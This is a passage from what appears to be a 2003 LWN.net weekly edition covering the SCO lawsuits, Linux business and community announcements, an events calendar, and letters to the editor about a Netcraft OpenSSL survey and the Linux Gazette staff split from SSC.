News.com looks into the money being made by the law firm representing SCO. "In a recent filing with the Securities and Exchange Commission, SCO reported that it is finalizing an agreement that would pay the law firm involved in its intellectual-property suits 20 percent of any money gained via settlements. The company's lawyers would receive the same percentage of any funds received through equity financings or a sale of the company while it has litigation pending. The agreement, first detailed in The Wall Street Journal on Thursday, also stipulates that additional payments could be made to the law firm of $1 million and 400,000 shares of SCO's common stock."
IBM's Subpoenas to Analysts and Investors: Why? Why? Why? (Groklaw)
Groklaw follows the money in a look at SCO's financial dealings. The bulk of the article is a lengthy investigation into yet another SCO lawsuit: the one charging securities fraud relating to SCO's (Caldera's) IPO. This has looked like a routine dotcom IPO sleaze case, but there is, it seems, an added twist: the use of paid "analyst opinions" to inflate the value of the stock. "Of course, being accused of something isn't at all the same as being found guilty of it. But at a minimum, I think we can assume that IBM is aware of this case. and while I have no inside information, I'm guessing that this little piece of history might inspire them to be interested in talking to the current crop of analysts, in addition to whatever other reasons they might have."
SCO, IBM battle heats up (News.com)
News.com reports that SCO has sent out a new set of subpoenas. "Those include Novell; Linus Torvalds, creator of the Linux kernel; Richard Stallman of the Free Software Foundation; Stewart Cohen, chief executive of the Open Source Development Labs; and John Horsley, general counsel of Transmeta." It sure would be fun to be able to watch while SCO's lawyers try to depose RMS...
Linux Adoption
Microsoft Loses to Linux in Thailand Struggle (LinuxInsider)
LinuxInsider has posted an article on growing Linux sales in Thailand. "Significantly, first-time PC users in Thailand are finding the Linux Thai Language Edition easier to master than Windows."
Interviews
Linus Fields Dev Questions On the Future of Linux (OET)
OpenEnterpriseTrends.com interviews Linus Torvalds. "OET brings our readers an extended transcript of Linus' shipboard Q&A, where he responds to Linux dev questions on the future of Linux, including the status of Linux 2.6, impacts from increasing corporate (and vendor) adoption, an ever-growing kernel, and even on the pending lawsuit from SCO."
Meet OAP -- an open robot reference design project (LinuxDevices)
LinuxDevices.com talks with Dafydd Walters, project leader of the Open Automaton Project. "OAP's SourceForge-hosted Website provides circuit schematics, source code, and documentation for free download under an Open Source license, "to enable robotics enthusiasts to assemble their own intelligent mobile robot," says Walters."
Interview with George Staikos (usalug.org)
The USA Linux Users Group features an interview with George Staikos, KDE core developer and promoter. What can you expect in KDE 3.2? George says, "Speed -- We did some great optimizations in various areas of KDE. Some of note include major KJS performance enhancements (from Apple and us as well), faster loading Konqueror via the preloader, application launch time reductions, and general optimizations to the core libraries."
Resources
Customizing a Lindows MobilePC (Linux Journal)
Steve Hastings shows how to convert a Lindows MobilePC into a vanilla Debian system on LinuxJournal. "My favorite version of Linux is Debian GNU/Linux, and I wanted my eNote to run the Unstable branch of Debian. This did not require a complete reinstall because Lindows is based on Debian, and Lindows includes all the essential Debian utilities, such as apt-get. Lindows does not use these utilities but its own Click-N-Run system. Lindows.com could have easily removed those utilities, but it left them in place; that was nice."
Reviews
Moodss for monitoring (NewsForge)
NewsForge reviews Moodss, a system monitoring application. "I downloaded the Moodss tarball from the website, decompressed it, and started it up. It's that easy. The main window is deceptively simple. Great power lurks just below the surface of that mild exterior."
Page editor: Forrest Cook
Announcements
Non-Commercial announcements
New Apache licenses under consideration
The Apache Software Foundation is developing a new set of licenses intended to cover software produced by Apache projects. There are three new licenses: the Apache License 2.0 would apply to most software, but the Apache RI License and the Apache TCK license deal with the extra constraints that come with Java-based projects. There are some concerns in some quarters that the licenses are not 100% free, due to some of the patent language and the Java restrictions. To your editor, however, they appear to be free licenses, given the fact that some Java software simply cannot be free. Interested people are encouraged to read the licenses and make comments - after having perused the mailing list archives.Open Source Software Institute Releases Components to eGovernment Web Services Platform
The Open Source Software Institute (OSSI) has announced the release and availability of Project Leopard (Phase 1), the core component of its eGovernment web services platform based on LAMP (Linux, Apache, MySQL, PHP/Perl/Python).GNOME News
Footnotes reports that the GNOME Foundation Membership & Elections Committee has announced the final list of candidates running for the 2003 elections.
Footnotes has also reports that
Chema Celorio died while skydiving in Mexico. "For those of you not
in Ximian who don't know, Chema started and ran our Mexico City office, led
the Ximian Setup Tools team a few years ago, was in charge of the team that
managed our contract with HP, led the Ximian Desktop for a while, was one
of the creators of GNOME Love, and was recently our lead sales engineer for
Europe.
"
DotGNU 0.1 Released on CD
Version 0.1 of DotGNU, the open-source alternative to .NET, is available on CD. "DotGNU, the GNU project's Free Software alternative to .NET, has come a long way in the last 2.5 years, and it is now possible to use DotGNU to implement application programs and web services in C#, running them in the DGEE webservice server, and integrating them with the phpGroupWare web-based GroupWare suite."
Commercial announcements
Aspen Systems Announces A Distribution Partnership With MandrakeSoft
Aspen Systems, Inc. has announced a distribution partnership with MandrakeSoft. Aspen Systems will enlarge its technology portfolio and will have the right to market, support and sell the MandrakeClustering Linux operating system in the United States.Sharp's "home server" to run MontaVista Linux
MontaVista has sent out a press release announcing that its "Professional Edition" will be running inside Sharp's HG-01S ("Galileo") home server. This server looks like a fun gadget, it handles video recording (onto an internal 120GB disk), functions as a web server, and can be controlled in several ways. One just hopes that a lot of attention is being paid to security issues.Novell acquires SUSE
It appears the rumors were correct: Novell has announced its intent to acquire SUSE Linux. As a result, "Novell will be the only $1 billion software company with a Linux distribution and the worldwide technical staff to support it". Novell is putting up $210 million in cash as part of the deal. Some of that is coming right back: IBM is going to invest $50 million in Novell, and the two companies will be working other deals to continue SUSE's support of Linux on IBM's systems. The deal should close by the end of January.
SGI Altix 3000 Proves Favorite With Linux Journal Readers
SGI has announced its SGI Altix 3000 family of servers and superclusters has been named "Favorite Server" in Linux Journal's annual Readers' Choice Awards.The return of Trustix Secure Linux
For Trustix Secure Linux users: the announcement has gone out that the acquisition of Trustix by the Comodo Group is complete, and Trustix Secure Linux will be returning to the market. The work that was done, for a short time, under the name "Tawie Server Linux" will be merged back into Trustix. "Confused? In plain text things are slowly going back to how they where before Trustix AS went bankrupt. It also means that we now have more resources than before, which will enable the TSL team to focus more on TSL development than we have been able to before".
Freedom Technology Center Events
A new Linux training facility is open. "The Freedom Technology Center, a new IT training facility in Mountain View, California, will open on Saturday, November 22nd with a free one-day class on email security, entitled "Protecting email users from viruses, spam, and other threats.""
Ransom Love joins Progeny board
Ransom Love has joined the board of Progeny. Mr Love is, of course, a co-founder of Caldera and served as its CEO for years - though he got out before Caldera turned into the SCO Group and went on the attack.Novell Lowers Linux Management Costs with Red Carpet Enterprise 2
Novell has announced the availability of Ximian Red Carpet Enterprise 2, the latest version of Ximian's management software for workstations and servers. Ximian Red Carpet Enterprise is part of Novell Resource Management and it extends the Linux capabilities of Novell ZENworks.UK Support available for Red Hat Enterprise
LinuxIT is now providing support for Red Hat Enterprise Linux V3 in the UK.Linux Bangalore/2003 Receives Sponsorship
The Linux Bangalore/2003 conference has secured the Platinum, Gold, and Silver levels of sponsorship from HP, Novell, and Exocore Consulting.MySQL gets more customers, sales projected to double
MySQL AB has sent out a press release proclaiming a new set of customers and the fact that it has doubled sales again over the last year.
New Books
Two Python manuals published
The first two volumes of the official Python documentation The Python Tutorial and Python Language Reference Manual are now available as printed books.
Resources
EDRI-gram newsletter
The November 5 EDRI-gram newsletter is out. This issue looks at the debate over the proposed European intellectual property rights enforcement directive (which appears to be facing a difficult road), "Big Brother" awards presented in several European countries, efforts to avoid the deployment of unsafe electronic voting systems, and several other topics.IBM releases Q4 Linux middle software CD Set
IBM has released its Q4 Linux middle software CD set. The set is available for free (registration required).LDP Weekly News
The November 12, 2003 edition of the Linux Documentation Project Weekly News is out with the latest documentation changes and additions. Take a look at the HOWTO generator and a discussion about HOWTOs lacking depth, among other things.OpenOffice.org Newsletter
Volume 1, Issue #5 of the OpenOffice.Org Newsletter has been published. Take a look for the latest OpenOffice.org reviews, MS Office 2003 critiques, and more.Open Source Maturity Model released
Gemini Ernst & Young have released a model for measuring the maturity of open-source software. "This model allows you to determine if or which open source product is suitable using just seven clear steps. Not only a good way to keep interesting but immature products away from your business, but also a useful tool to objectify the discussion on applying Open Source in the workplace." Feedback is requested.
Upcoming Events
The Grid Wars Parallel Programming Challenge
Submissions are open until November 15, 2003 for the Grid Wars parallel programming challenge.Open Source at Comdex Winners and Results (O'Reilly)
O'Reilly has announced the results of a contest for populating the COMDEX Open Source Pavilion. Winning projects include: Plone, KDE, OpenOffice.org, Zope, the Gimp, and GNOME.KDE at the Comdex Open Source Pavilion
KDE.News reports on the KDE presence at the upcoming COMDEX conference. "KDE will be represented at the large US computer show COMDEX, in Las Vegas, from the 17th to 20th November, as a result of placing second in a poll run by O'Reilly Network. Developer George Staikos will be demonstrating the soon-to-be-released KDE 3.2, featuring a vast number of improvements in all areas, as well Kolab, the Free Software groupware solution."
Desktop Linux Consortium offers discounts to LUGs
the Desktop Linux Consortium has announced the availability of a discounted entry fee for LUG members. "Responding to many requests, The Desktop Linux Consortium has announced that Integrated Computer Solutions (ICS) of Cambridge, MA has offered to support members of Linux User Groups (LUGs) in attending the Desktop Linux Consortium Conference at Boston University's Corporate Education Center by offering a limited number of spots for LUG members for US $25."
GUADEC 2004 Slated for Norway
Here's a press release for the fifth annual GNOME User and Developer European Conference (GUADEC). GUADEC 5 (or GVADEC) will be held in Kristiansand, Norway, June 28-30, 2004.WineConf 2004 announced
WineConf 2004 will be held from January 31 to February 1, 2004 in St. Paul, Minnesota.LUGOD November Installfest
The Linux Users' Group of Davis, California will be holding another Linux Installfest workshop on Sunday, November 16, 2003.Events: November 13 - January 8, 2003
| Date | Event | Location |
|---|---|---|
| November 14 - 16, 2003 | Third International Ruby Conference | (Red Lion Hotel)Austin, Texas |
| November 15 - 21, 2003 | Supercomputing Conference(SC2003) | (Phoenix Civic Plaza Convention Center)Phoenix, AZ |
| November 16 - 19, 2003 | ApacheCon 2003 | Las Vegas, Nevada |
| November 16 - 20, 2003 | COMDEX 2003 | (Las Vegas Convention Center)Las Vegas, Nevada |
| November 20 - 21, 2003 | ObjectWeb Conferenc3 | (INRIA Rocquencourt)Rocquencourt, France |
| November 22, 2003 | Southern California Linux Expo(SCALE) | (Los Angeles Convention Center)Los Angeles, CA |
| November 22 - 24, 2003 | New York GNOME Summit | (Brooklyn College)New York, NY |
| November 24 - 26, 2003 | Open Standards and Libre Software in Government Conference (CANCELLED)(EGOVOS 3) | Paris, France |
| November 26 - 27, 2003 | Forum PHP Paris 2003 | (Club Confair)Paris, France |
| December 2 - 4, 2003 | Linux Bangalore/2003 | Bangalore, India |
| December 9 - 13, 2003 | International Conference on Logic Programming(ICLP'03) | Mumbai (Bombay), India |
Software announcements
This week's software announcements
Here are the software announcements, courtesy of Freshmeat.net. They are available in two formats:
- Sorted alphabetically,
- Sorted by license.
Miscellaneous
MSfreePC.com Donating Money to Mozilla (MozillaZine)
MozillaZine reports on a new way of funding open-source software development. "Those California residents who qualify for the $1.1 billion MS antitrust settlement can choose to have money donated to open source projects, including Mozilla, at a website set up by Lindows." Microsoft antagoniser Lindows.com set up MSfreePC.com as an alternative to the standard claims procedure agreed by Microsoft and Towsend and Towsend and Crew, lawyers for the plantiffs. Whenever a qualifying consumer uses the site to claim his or her share of the legal settlement, MSfreePC.com will contribute 10% of the value of the claim to Mozilla or one of four other open-source projects, including Debian, KDE, GNOME and OpenOffice.org."
Page editor: Forrest Cook
Letters to the editor
Many vulnerable OpenSSL libraries in the wild?
| From: | Jerome Lacoste <lacostej-AT-frisurf.no> | |
| To: | magnus-AT-netcraft.com | |
| Subject: | Many vulnerable OpenSSL libraries in the wild? | |
| Date: | Thu, 06 Nov 2003 14:18:49 +0100 | |
| Cc: | letters-AT-lwn.net |
Magnus,
I wished to react to the Netcraft's article posted under your name
regarding the high number of obsolete and thus vulnerable versions of
OpenSSL found on the Internet.
I tend to question the way the gathering of the data was done. It seems,
according to your article that you just used the Web server's signature.
Unfortunately this is not sufficient, and this for at least one reason:
the backporting of security fixes.
Many Linux distributions backport fixes, meaning that the version number
will not be increased while the vulnerability will be removed.
Taking two examples of two machines I have at hand, one running Debian
Woody one running Mandrake 9.1. These two machines are accessible on the
Internet.
jerome-AT-debian Woody> dpkg -l openssl
ii openssl 0.9.6c-2.woody.4 [...]
jerome-AT-mandrake 9.2> rpm -q openssl
openssl-0.9.7a-1.2.91mdk
Does that mean that mandrake 9.1 and Debian Woody are vulnerable? No (at
least to currently known vulnerabilities). But these 2 machines would
(and perhaps have been) counted in the results of the NetCraft survey.
The only way to find out whether a vulnerability is present or not is to
try to exploit it. That's what the people from NISC seems to be doing.
What I am afraid of is that this survey seems to create a false sense or
risk for solutions running on OpenSSL. Many of these solutions are open
source, and this article could be used as FUD against these systems.
So until a better way to identify whether these systems are indeed
vulnerable, I would be happy if Netcraft could publish an addendum to
that article, in order to decrease this perhaps false sense of risk that
this article generated.
See also the article on LWN for more discussions[2].
Cheers,
Jerome
[1] http://news.netcraft.com/[...]
[2] http://lwn.net/Articles/56713/
--
Jerome Lacoste - CoffeeBreaks - IT Consulting
jerome-AT-coffeebreaks.org - http://www.CoffeeBreaks.org
Linux Gazette
| From: | "Jay R. Ashworth" <jra-AT-baylink.com> | |
| To: | publisher-AT-linuxgazette.com | |
| Subject: | Re: Linux Gazette | |
| Date: | Thu, 6 Nov 2003 12:13:06 -0500 | |
| Cc: | letters-AT-lwn.net, tag-AT-linuxgazette.net, linux-questions-only-AT-ssc.com |
On Thu, Nov 06, 2003 at 11:22:16AM -0600, Phil Hughes wrote:
> I have been told by Heather Stern, acting as a spokesperson for TAG
> members, that all TAG members have elected to leave their volunteer
> position with Linux Gazette and move on to working on a new
> e-publication. As you are all volunteers, that is certainly your choice
> and I both respect your decision and want to thank you for your past
> contributions.
>
> I don't want to load you down with details if you are not interested in
> participating but I do want to reassure you that Linux Gazette is not
> going off in some strange new direction.
Alas, Phil, the concensus is that you *are, in fact* going off in some
strage new direction, and I concur with those who think so. And,
indeed, the Gazette *is* the people. I've seen, specifically, Sassy,
Computer Telephony, and Boardwatch curl up and die when the original
editors were replaced by corporate managements.
> In any case, based on Heather's statements, my default assumption will
> be that you have decided to move elsewhere. If that is not the case,
> please e-mail me at publisher-AT-linuxgazette.com and let me know your
> intentions. In any case, thanks again for your past work with Linux
> Gazette.
I continue to work with Linux Gazette, Phil; it's just not yours
anymore. Rumbles I hear about trademark infringement and threats like
suggest that you haven't quite figured that out yet. I think that's a
shame, really... but the community interprets silly corporate
manouevring as damage, and routes around it.
I hope this doesn't reflect negatively on the Journal; I've been happy
lately to see that your art direction and editing have been improving.
Cheers,
-- jra
--
Jay R. Ashworth jra-AT-baylink.com
Member of the Technical Staff Baylink RFC 2100
The Suncoast Freenet The Things I Think
Tampa Bay, Florida http://baylink.pitas.com +1 727 647 1274
OS X: Because making Unix user-friendly was easier than debugging Windows
-- Simon Slavin, on a.f.c
Linux Gazette
| From: | Rick Moen <rick-AT-linuxmafia.com> | |
| To: | tag-AT-linuxgazette.net, linux-questions-only-AT-ssc.com | |
| Subject: | Re: [TAG] Re: Linux Gazette | |
| Date: | Thu, 6 Nov 2003 10:43:36 -0800 | |
| Cc: | letters-AT-lwn.net |
[Reply-To set to TAG. Not Cc'ing Phil, since he's already seen this.]
Quoting Jay R. Ashworth (jra-AT-baylink.com):
> Alas, Phil, the concensus is that you *are, in fact* going off in some
> strange new direction, and I concur with those who think so.
It's important to realise that, at the time the staff (unanimously)
decided to leave, Phil and his webmaster had pretty much announced it as
a fait accompli that all the core concepts of a magazine (periodic
issues, editors) were to be done away with when the CMS rolled in.
He suddenly about-faced and _rediscovered_ interest in those concepts
only after we published the November (linuxgazette.net) issue.
Just because the TAG people and public haven't seen it before, what
follows is the staff's polite and appreciative notice to Phil on Oct. 28
that we were moving the magazine -- as previously discussed with him
numerous times as likely if he followed his plan. The text was kept
confidential at the time, because of the last item mentioned, but here
it is now nine days later, and SSC is still wrongfully asserting
copyright over Yan-Fa Li and LeaAnne Kolp's work. (See:
http://www.linuxgazette.com/node/view/58
http://www.linuxgazette.com/node/view/61 )
From rick Tue Oct 28 12:01:56 2003
Date: Tue, 28 Oct 2003 12:01:56 -0800
To: Phil Hughes <fyl-AT-a42.com>
Cc: Jeff Tinsler <jet-AT-comwestcr.com>
Subject: Transition matters
User-Agent: Mutt/1.5.4i
Dear Mr. Hughes:
I'm writing on behalf of the Linux Gazette staff and its current
leadership, Mike Orr and Heather Stern, to fill you in on what is going
on with Linux Gazette's magazine production and hosting, and to arrange
for an orderly transition.
SSC, Inc. has always been incredibly supportive of LG's activities,
helping out with mirror space four months after John M. Fisk founded our
publication at his ISP in Nashville, and then furnishing our _primary_
hosting for seven years -- from August 1996 until a few days ago.
Moreover, you've actually underwritten some of your staff's time in
helping us (Marjorie Richardson, Amy Kukuk, Mike Orr, Jeff Tinzler, and
others) throughout that time. We are very grateful.
Recently, Linux Gazette's staff decided that we needed to move our
hosting to a different site, because, although we are sympathetic to
your aim of operating a dynamic, CMS-driven site open to public posting,
that is not compatible with Linux Gazette's longstanding mission to
publish a periodic set of edited newsletters with editor-picked, fixed
contents. Our new host site will be at http://www.linuxgazette.net/ ,
with the November issue coming out in a few days. We felt you should
know this immediately, in advance of any public announcement.
Following are a number of transition items we'd like to call to your
attention:
(1) Linux Gazette has been hosted at SSC so long that, inevitably, there
are some snarls we'll need to untangle: One is the existing LG
e-mail addresses, which we'd like to somehow transition over. We
would be glad to furnish an alias table for your sysadmins.
(2) Likewise, if you wish for any SSC sites to carry mirror copies of LG
issues, you'll have to establish a new mirroring run to pull them
down from our main site or its other mirrors. You are of course
welcome to use LG content in any way that complies with the Open
Publication License (issues #9 - present) or the BSD licence (issues
#1-8). There is actually an existing problem in that area, needing
SSC's immediate attention, about which more below.
(3) We would of course appreciate SSC assisting in letting the public
know of Linux Gazette's move. The other Linux press outlets will be
notified, a short time after this e-mail, and SSC's aid in getting
the word out will help assure a smooth changeover.
(4) In the course of populating our mirror network with back issues,
we've noticed that at least two of the issues carried on SSC's own
site (and from there picked up by most of its mirrors) now have
modifications to the magazine text that were not authorised by the
staff. I refer to issue #95 (Oct. 2003), for which SSC's copy is
missing a large fraction of the Mailbag article, and issue #92 (July
2003), which is missing Janine M. Lodato's article "Linux to Save
the Health of the World". These deletions were done without the
knowledge or approval of the staff, and impair the integrity of our
magazine's content. Accordingly, we must ask that you and all
downstream mirrors reverse those two -- and any other --
unauthorised changes to magazine text that SSC has enacted without
consulting the LG staff.
The issue #95 deletion I'm referring to is the same one we inquired
with you about in e-mail a couple of weeks ago, without receiving
any reply from you or from Jeff Tinzler. Clearer channels of
communication might have averted this situation.
(5) We wish you the best of luck with the recently deployed CMS-based
site. It is, however, absolutely not Linux Gazette, which (as
mentioned) we will keep publishing indefinitely on a non-CMS site.
Accordingly, we would appreciate your firm coining some other name
to use for the CMS site, and also assigning the linuxgazette.com
domain to us at your earliest convenience, to reduce confusion
between the sites.
The last item I need to mention is obviously sensitive, and so we are
deliberately bringing it to your attention privately, to avoid public
attention to it. (We assume that the problem referred to was created
entirely inadvertantly.)
(6) As we've seen material being added to your CMS-based site in chunks
taken from prior LG issues, it seems that author attributions are
being (inadvertantly) stripped from the articles, the author's
copyright notice removed, and SSC's copyright notice added in the
latter's place. Staffer Michael "Mick" Conry happened to notice
this happening with his News Bytes articles, now visible inside the
CMS at http://www.linuxgazette.com/node/view/92 . Mick's posted
copyright notice, viewable at
http://www.tldp.org/LDP/LG/current/lg_bytes.html, was wrongfully
removed from the CMS rendition. Such treatment of authors'
articles, in addition to being disrespectful of the authors' rights
to credit and ownership, constitutes violation of the covering Open
Publication License, and thus of copyright law.
We would love to be able to tell you that Mick's are the only articles
to which this happened -- or to give you a complete list of the
problematic postings -- but we don't (yet) have that information.
Accordingly, we strongly suggest that you do whatever is required to
find and correct all instances of credits / copyright notices
stripped from LG articles throughout your CMS.
We regret having to bring that matter to your attention, but are
obliged to take this matter seriously, as protectors of our authors'
interests. We would hope you can send us written assurance within
two days from this message's datestamp that no such instances exist
any more on your CMS. Please advise us by that same date if you
need additional time.
Because of the unfortunate pattern of non-communication with the
staff concerning SSC's unauthorised deletions from issue #95, and
the complete lack of consultation with the staff on SSC's deletions
from issue #92 and possibly others, we have to insist on a specific
written response on that matter. If we do not receive it, we will
have to pursue more public options, which we very much prefer to
avoid.
Thank you greatly for your patience and forebearance on these difficult
issues, which I expect and hope will be soon behind us. Pending our
straightening out our long-term communications channels, I would suggest
replying to both Mike Orr <mso-AT-oz.net>, and Heather Stern
<star-AT-starshine.org>, as they are leading the staff during this interim
period.
Yours Respectfully,
Rick Moen
on behalf of the Linux Gazette staff as a whole
Page editor: Jonathan Corbet